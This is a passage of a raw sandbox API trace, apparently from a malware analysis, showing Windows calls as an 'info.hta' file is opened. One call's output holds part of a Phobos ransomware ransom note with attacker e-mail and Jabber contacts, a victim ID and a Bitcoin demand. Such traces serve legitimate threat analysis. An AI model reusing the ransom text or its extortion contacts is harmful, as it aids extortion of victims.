ppvObject=0x41f420*=0x49c07c) returned 0x0 [0226.470] IUnknown:Release (This=0x49c07c) returned 0x9 [0226.470] IUnknown:AddRef (This=0x49c07c) returned 0xa [0226.470] IUnknown:Release (This=0x49c07c) returned 0x9 [0226.470] IUri:GetAbsoluteUri (in: This=0x49c07c, pbstrAbsoluteUri=0x41f49c | out: pbstrAbsoluteUri=0x41f49c*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0226.470] SysStringLen (param_1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x38 [0226.470] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41f4b8 | out: ppURI=0x41f4b8*=0x49c22c) returned 0x0 [0226.470] IUnknown:Release (This=0x49c07c) returned 0x8 [0226.470] IUri:GetScheme (in: This=0x49c22c, pdwScheme=0x41f44c | out: pdwScheme=0x41f44c*=0x9) returned 0x0 [0226.470] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.470] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.470] IUri:GetAbsoluteUri (in: This=0x49c22c, pbstrAbsoluteUri=0x4e7648 | out: pbstrAbsoluteUri=0x4e7648*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0226.470] SetTimer (hWnd=0x30198, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0226.470] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f448 | out: ppu=0x41f448) returned 0x0 [0226.470] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4b3a88 [0226.610] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4e2fe0 [0226.610] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4bedf0, Size=0x60) returned 0x4bafb0 [0226.610] GetCursorPos (in: lpPoint=0x41f298 | out: lpPoint=0x41f298*(x=449, y=50)) returned 1 [0226.610] ScreenToClient (in: hWnd=0x30198, lpPoint=0x41f298 | out: lpPoint=0x41f298) returned 1 [0226.610] GetKeyState (nVirtKey=16) returned 0 [0226.610] GetKeyState (nVirtKey=17) returned 0 [0226.610] GetKeyState (nVirtKey=18) returned 0 [0226.610] GetKeyState (nVirtKey=160) returned 0 [0226.610] GetKeyState (nVirtKey=162) returned 0 [0226.610] GetKeyState (nVirtKey=164) returned 0 [0226.610] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x4be268 [0226.611] GetCurrentThreadId () returned 0x390 [0226.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be268 | out: hHeap=0x470000) returned 1 [0226.611] GetCurrentThreadId () returned 0x390 [0226.611] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4826e8 [0226.611] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f438 | out: ppu=0x41f438) returned 0x0 [0226.611] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x41f41c | out: ppURI=0x41f41c*=0x49c07c) returned 0x0 [0226.611] IUnknown:AddRef (This=0x49c07c) returned 0xa [0226.611] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f3bc, dwFlags=0x0 | out: pdwZone=0x41f3bc*=0xffffffff) returned 0x800c0011 [0226.611] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.611] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.611] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.611] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x2700, pPolicy=0x41f3c0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x41f3c0*=0x0) returned 0x0 [0226.611] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.611] IUnknown:Release (This=0x49c07c) returned 0x9 [0226.611] IUnknown:Release (This=0x49c07c) returned 0x8 [0226.611] IUnknown:AddRef (This=0x49c22c) returned 0x4 [0226.611] IUri:GetPropertyDWORD (in: This=0x49c22c, uriProp=0x11, pdwProperty=0x41f1f4, dwFlags=0x0 | out: pdwProperty=0x41f1f4*=0x9) returned 0x0 [0226.611] IUnknown:Release (This=0x49c22c) returned 0x3 [0226.611] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x482768 [0226.611] IInternetSecurityManager:GetSecurityId (in: This=0x4a38e8, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f250, pcbSecurityId=0x41f24c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f250*=0x66, pcbSecurityId=0x41f24c*=0x9) returned 0x0 [0226.611] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f250, pcbSecurityId=0x41f24c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f250*=0x0, pcbSecurityId=0x41f24c*=0x200) returned 0x800c0011 [0226.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482768 | out: hHeap=0x470000) returned 1 [0226.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.611] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9) returned 0x4e07e8 [0226.611] StrCmpICW (pszStr1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0226.611] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f3e4 | out: ppvObject=0x41f3e4*=0x49c07c) returned 0x0 [0226.612] IUnknown:Release (This=0x49c07c) returned 0x8 [0226.612] IUnknown:AddRef (This=0x49c07c) returned 0x9 [0226.612] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12c) returned 0x4e6fa0 [0226.612] CBaseMoniker::AddRef () returned 0x2 [0226.612] IUnknown:AddRef (This=0x49c07c) returned 0xa [0226.612] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f3a8 | out: ppvObject=0x41f3a8*=0x49c07c) returned 0x0 [0226.612] IUnknown:Release (This=0x49c07c) returned 0xa [0226.612] IUnknown:AddRef (This=0x49c07c) returned 0xb [0226.612] IUnknown:Release (This=0x49c07c) returned 0xa [0226.612] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x4bedf0 [0226.612] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb4) returned 0x4b2118 [0226.612] IUri:GetScheme (in: This=0x49c07c, pdwScheme=0x41f42c | out: pdwScheme=0x41f42c*=0x9) returned 0x0 [0226.612] IUri:IsEqual (in: This=0x49c22c, pUri=0x49c07c, pfEqual=0x41f474 | out: pfEqual=0x41f474*=1) returned 0x0 [0226.613] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae958 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x4e3000 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x50) returned 0x4ae9b0 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4bb018 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12c) returned 0x4e37c8 [0226.613] IUnknown:AddRef (This=0x49c07c) returned 0xb [0226.613] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f3c8 | out: ppvObject=0x41f3c8*=0x49c07c) returned 0x0 [0226.613] IUnknown:Release (This=0x49c07c) returned 0xb [0226.613] IUnknown:AddRef (This=0x49c07c) returned 0xc [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4aea08 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x68) returned 0x4c2888 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x108) returned 0x4e3900 [0226.613] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4e0800 [0226.614] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xcc) returned 0x49cec8 [0226.614] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4e0818 [0226.614] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x4be2a0 [0226.614] IUnknown:AddRef (This=0x4a3d90) returned 0x3 [0226.614] IUnknown:AddRef (This=0x49c07c) returned 0xd [0226.614] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f388 | out: ppvObject=0x41f388*=0x49c07c) returned 0x0 [0226.614] IUnknown:Release (This=0x49c07c) returned 0xd [0226.614] IUnknown:AddRef (This=0x49c07c) returned 0xe [0226.614] IUri:GetScheme (in: This=0x49c07c, pdwScheme=0x41f38c | out: pdwScheme=0x41f38c*=0x9) returned 0x0 [0226.614] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1006) returned 0x4b4ad8 [0226.614] CMemStm::Read () returned 0x0 [0226.614] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4aea60 [0226.614] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x200c) returned 0x4d3650 [0226.615] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2006) returned 0x4d5668 [0226.615] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4b4ad8, cbMultiByte=4096, lpWideCharStr=0x4d566c, cchWideChar=4096 | out: lpWideCharStr="\r\n\r\n \r\n \r\n phobos\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
\r\n\x09\x09\r\n\x09\x09
All your files have been encrypted!
\r\n\x09
\r\n
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail tedmundboardus@aol.com
\x09
Write this ID in the title of your message 9C354B42-0001
\r\n\x09
In case of no answer in 24 hours write us to this e-mail:tylecotebenji@aol.com
\r\n\x09
If there is no response from our mail, you can install the Jabber client and write to us in support of phobos_helper@xmpp.jp
\r\n
\r\n\x09\x09You have to pay for decryption in Bitcoins. The price d") returned 4096 [0226.615] CMemStm::Read () returned 0x0 [0226.616] IUnknown:Release (This=0x49c07c) returned 0xd [0226.616] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.616] IUnknown:Release (This=0x4afa00) returned 0x2 [0226.616] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.616] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482668 | out: hHeap=0x470000) returned 1 [0226.616] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.616] IUnknown:Release (This=0x49c07c) returned 0xc [0226.616] IUnknown:Release (This=0x49c07c) returned 0xb [0226.617] CMemStm::Release () returned 0x1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] IUnknown:Release (This=0x4afa00) returned 0x1 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.617] CoTaskMemFree (pv=0x0) [0226.617] IUnknown:AddRef (This=0x49c07c) returned 0xc [0226.617] IUri:GetPropertyDWORD (in: This=0x49c07c, uriProp=0x11, pdwProperty=0x41f18c, dwFlags=0x0 | out: pdwProperty=0x41f18c*=0x9) returned 0x0 [0226.617] IUnknown:Release (This=0x49c07c) returned 0xb [0226.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4825e8 [0226.617] IInternetSecurityManager:GetSecurityId (in: This=0x4a38e8, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f3f0, pcbSecurityId=0x41f1e8*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f3f0*=0x66, pcbSecurityId=0x41f1e8*=0x9) returned 0x0 [0226.617] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f3f0, pcbSecurityId=0x41f1e8*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f3f0*=0x0, pcbSecurityId=0x41f1e8*=0x200) returned 0x800c0011 [0226.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.618] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.618] IUri:GetPropertyDWORD (in: This=0x49c22c, uriProp=0x11, pdwProperty=0x41f18c, dwFlags=0x0 | out: pdwProperty=0x41f18c*=0x9) returned 0x0 [0226.618] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.618] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4825e8 [0226.618] IInternetSecurityManager:GetSecurityId (in: This=0x4a38e8, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f1f0, pcbSecurityId=0x41f1ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f1f0*=0x66, pcbSecurityId=0x41f1ec*=0x9) returned 0x0 [0226.618] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f1f0, pcbSecurityId=0x41f1ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f1f0*=0x0, pcbSecurityId=0x41f1ec*=0x200) returned 0x800c0011 [0226.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48d968 | out: hHeap=0x470000) returned 1 [0226.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b3dc8 | out: hHeap=0x470000) returned 1 [0226.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.669] IUnknown:Release (This=0x4a38e8) returned 0x0 [0226.669] IUnknown:Release (This=0x4a2074) returned 0x0 [0226.669] IUnknown:Release (This=0x744796bc) returned 0x7 [0226.669] IUnknown:AddRef (This=0x49c07c) returned 0xc [0226.669] IUri:GetPropertyDWORD (in: This=0x49c07c, uriProp=0x11, pdwProperty=0x41f4c4, dwFlags=0x0 | out: pdwProperty=0x41f4c4*=0x9) returned 0x0 [0226.669] IUnknown:Release (This=0x49c07c) returned 0xb [0226.669] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x4a206c, dwReserved=0x0 | out: ppSM=0x4a206c*=0x4bb080) returned 0x0 [0226.669] IInternetSecurityManager:SetSecuritySite (This=0x4bb080, pSite=0x4a2074) returned 0x0 [0226.669] IUnknown:AddRef (This=0x4a2074) returned 0xc8 [0226.669] IUnknown:QueryInterface (in: This=0x4a2074, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x41d48c | out: ppvObject=0x41d48c*=0x4a2078) returned 0x0 [0226.669] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x4bb0a8 | out: ppvObject=0x4bb0a8*=0x0) returned 0x80004002 [0226.669] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x4bb0a4 | out: ppvObject=0x4bb0a4*=0x0) returned 0x80004002 [0226.669] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x4bb0a0 | out: ppvObject=0x4bb0a0*=0x744796bc) returned 0x0 [0226.669] IUnknown:Release (This=0x4a2078) returned 0x0 [0226.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4825e8 [0226.669] IInternetSecurityManager:GetSecurityId (in: This=0x4bb080, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f520, pcbSecurityId=0x41f51c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f520*=0x66, pcbSecurityId=0x41f51c*=0x9) returned 0x0 [0226.669] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f520, pcbSecurityId=0x41f51c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f520*=0x0, pcbSecurityId=0x41f51c*=0x200) returned 0x800c0011 [0226.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.670] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.670] IUri:GetPropertyDWORD (in: This=0x49c22c, uriProp=0x11, pdwProperty=0x41f294, dwFlags=0x0 | out: pdwProperty=0x41f294*=0x9) returned 0x0 [0226.670] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4825e8 [0226.670] IInternetSecurityManager:GetSecurityId (in: This=0x4bb080, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f2f0, pcbSecurityId=0x41f2ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f2f0*=0x66, pcbSecurityId=0x41f2ec*=0x9) returned 0x0 [0226.670] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f2f0, pcbSecurityId=0x41f2ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f2f0*=0x0, pcbSecurityId=0x41f2ec*=0x200) returned 0x800c0011 [0226.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.670] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.670] IUri:GetPropertyDWORD (in: This=0x49c22c, uriProp=0x11, pdwProperty=0x41f4c4, dwFlags=0x0 | out: pdwProperty=0x41f4c4*=0x9) returned 0x0 [0226.670] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4825e8 [0226.670] IInternetSecurityManager:GetSecurityId (in: This=0x4bb080, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f520, pcbSecurityId=0x41f51c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f520*=0x66, pcbSecurityId=0x41f51c*=0x9) returned 0x0 [0226.670] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f520, pcbSecurityId=0x41f51c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f520*=0x0, pcbSecurityId=0x41f51c*=0x200) returned 0x800c0011 [0226.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.670] IUnknown:AddRef (This=0x49c07c) returned 0xc [0226.670] IUri:GetPropertyDWORD (in: This=0x49c07c, uriProp=0x11, pdwProperty=0x41f294, dwFlags=0x0 | out: pdwProperty=0x41f294*=0x9) returned 0x0 [0226.670] IUnknown:Release (This=0x49c07c) returned 0xb [0226.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x4825e8 [0226.670] IInternetSecurityManager:GetSecurityId (in: This=0x4bb080, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f2f0, pcbSecurityId=0x41f2ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f2f0*=0x66, pcbSecurityId=0x41f2ec*=0x9) returned 0x0 [0226.670] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f2f0, pcbSecurityId=0x41f2ec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f2f0*=0x0, pcbSecurityId=0x41f2ec*=0x200) returned 0x800c0011 [0226.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0226.830] IUnknown:Release (This=0x4805d8) returned 0x1 [0226.830] IUnknown:Release (This=0x49c07c) returned 0xa [0226.830] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4870 | out: hHeap=0x470000) returned 1 [0226.830] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.830] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x493748 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae220 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bfd30 | out: hHeap=0x470000) returned 1 [0226.831] GetCurrentThreadId () returned 0x390 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a9480 | out: hHeap=0x470000) returned 1 [0226.831] GetCurrentThreadId () returned 0x390 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae1c8 | out: hHeap=0x470000) returned 1 [0226.831] ValidateRect (hWnd=0x30198, lpRect=0x0) returned 1 [0226.831] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0226.831] IUri:GetPropertyDWORD (in: This=0x49c22c, uriProp=0x11, pdwProperty=0x41f4c4, dwFlags=0x0 | out: pdwProperty=0x41f4c4*=0x9) returned 0x0 [0226.831] IUnknown:Release (This=0x49c22c) returned 0x2 [0226.831] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x481de8 [0226.831] IInternetSecurityManager:GetSecurityId (in: This=0x4bb080, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f528, pcbSecurityId=0x41f524*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f528*=0x66, pcbSecurityId=0x41f524*=0x9) returned 0x0 [0226.831] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f528, pcbSecurityId=0x41f524*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f528*=0x0, pcbSecurityId=0x41f524*=0x200) returned 0x800c0011 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481de8 | out: hHeap=0x470000) returned 1 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49df00 | out: hHeap=0x470000) returned 1 [0226.831] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9) returned 0x49df00 [0226.831] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4cde88 | out: hHeap=0x470000) returned 1 [0226.831] GetTickCount () returned 0x209df [0226.831] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] CoTaskMemAlloc (cb=0x6d) returned 0x4a9480 [0226.832] CoTaskMemAlloc (cb=0x9) returned 